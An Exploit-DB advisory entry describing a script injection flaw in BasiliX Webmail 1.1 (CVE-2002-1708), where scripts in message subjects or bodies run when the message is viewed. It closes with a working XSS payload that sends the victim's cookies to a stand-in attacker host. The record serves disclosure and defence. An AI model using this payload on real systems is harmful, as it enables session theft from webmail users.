BasiliX Webmail 1.1 Message Content Script Injection Vulnerability

2002-06-19T00:00:00
ID EDB-ID:21570
Type exploitdb
Reporter Ulf Harnhammar
Modified 2002-06-19T00:00:00

Description

BasiliX Webmail 1.1 Message Content Script Injection Vulnerability. CVE-2002-1708. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/5060/info

BasiliX is a web-based mail application. It offers features such as mail attachments, address book, multiple language and theme support.

A script injection issue has been reported in BasiliX Webmail. Script commands are not filtered from the Subject or message body, and may execute in the context of the BasiliX site when the content is viewed.

This has been reported in BasiliX Webmail 1.1.0, earlier versions may also be affected.

<script>self.location.href="http://evilhost.com/evil?"+escape(document.
cookie)</script>